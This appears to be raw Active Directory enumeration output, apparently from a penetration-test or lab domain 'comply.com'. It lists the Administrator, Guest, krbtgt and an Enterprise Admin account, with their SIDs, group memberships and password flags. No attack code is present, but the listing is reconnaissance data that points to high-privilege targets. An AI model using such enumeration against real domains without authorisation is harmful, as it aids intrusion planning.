description : Built-in account for administering the computer/domain
distinguishedname : CN=Administrator,CN=Users,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
lastlogontimestamp : 7/31/2022 1:03:53 AM
name : Administrator
objectsid : S-1-5-21-1135011135-3178090508-3151492220-500
samaccountname : Administrator
logonhours : {255, 255, 255, 255...}
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : 12/31/1600 4:00:00 PM
cn : Administrator
whenchanged : 7/31/2022 8:03:53 AM
instancetype : 4
usncreated : 8196
objectguid : 208616bc-47bb-42fc-931f-a5ea021c82b6
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:40:57 PM, 7/15/2020 8:40:57 PM, 7/15/2020 8:25:47 PM, 1/1/1601 6:12:16 PM}
memberof : {CN=Group Policy Creator Owners,CN=Users,DC=comply,DC=com, CN=Domain
Admins,CN=Users,DC=comply,DC=com, CN=Enterprise Admins,CN=Users,DC=comply,DC=com, CN=Schema
Admins,CN=Users,DC=comply,DC=com...}
lastlogon : 7/31/2022 1:03:54 AM
badpasswordtime : 11/6/2020 4:44:48 AM
badpwdcount : 0
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/15/2020 8:24:22 PM
countrycode : 0
primarygroupid : 513
pwdlastset : 8/2/2020 10:52:21 AM
usnchanged : 69689
pwdlastset : 12/31/1600 4:00:00 PM
logoncount : 0
badpasswordtime : 12/31/1600 4:00:00 PM
description : Built-in account for guest access to the computer/domain
distinguishedname : CN=Guest,CN=Users,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
name : Guest
objectsid : S-1-5-21-1135011135-3178090508-3151492220-501
samaccountname : Guest
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : Guest
whenchanged : 7/15/2020 8:24:22 PM
instancetype : 4
usncreated : 8197
objectguid : 7b53e4be-388c-4d02-9848-da6302ad67bb
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:25:47 PM, 1/1/1601 12:00:01 AM}
memberof : CN=Guests,CN=Builtin,DC=comply,DC=com
lastlogon : 12/31/1600 4:00:00 PM
badpwdcount : 0
useraccountcontrol : ACCOUNTDISABLE, PASSWD_NOTREQD, NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/15/2020 8:24:22 PM
countrycode : 0
primarygroupid : 514
iscriticalsystemobject : True
usnchanged : 8197
logoncount : 0
iscriticalsystemobject : True
description : Key Distribution Center Service Account
distinguishedname : CN=krbtgt,CN=Users,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
name : krbtgt
showinadvancedviewonly : True
objectsid : S-1-5-21-1135011135-3178090508-3151492220-502
samaccountname : krbtgt
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : krbtgt
whenchanged : 7/15/2020 8:40:57 PM
instancetype : 4
usncreated : 12324
objectguid : a8468773-3587-4278-b288-222c30b2a742
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:40:57 PM, 7/15/2020 8:25:47 PM, 1/1/1601 12:04:16 AM}
serviceprincipalname : kadmin/changepw
memberof : CN=Denied RODC Password Replication Group,CN=Users,DC=comply,DC=com
lastlogon : 12/31/1600 4:00:00 PM
badpasswordtime : 12/31/1600 4:00:00 PM
badpwdcount : 0
useraccountcontrol : ACCOUNTDISABLE, NORMAL_ACCOUNT
whencreated : 7/15/2020 8:25:47 PM
countrycode : 0
primarygroupid : 513
pwdlastset : 7/15/2020 1:25:47 PM
msds-supportedencryptiontypes : 0
usnchanged : 12830
logoncount : 0
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=Nicky,OU=ComAdmins,OU=ComUsers,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
displayname : Nicky
userprincipalname : [email protected]
name : Nicky
objectsid : S-1-5-21-1135011135-3178090508-3151492220-1103
samaccountname : nicky
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : Nicky
whenchanged : 7/15/2020 8:40:57 PM
instancetype : 4
usncreated : 12798
objectguid : 42dc1442-d1f9-47ee-b1e3-84024b5e720c
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 8:40:57 PM, 1/1/1601 12:00:00 AM}
givenname : Nicky
memberof : CN=Enterprise Admins,CN=Users,DC=comply,DC=com
lastlogon : 12/31/1600 4:00:00 PM
badpwdcount : 0
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/15/2020 8:37:23 PM
countrycode : 0
primarygroupid : 513
pwdlastset : 7/15/2020 1:37:23 PM
usnchanged : 12813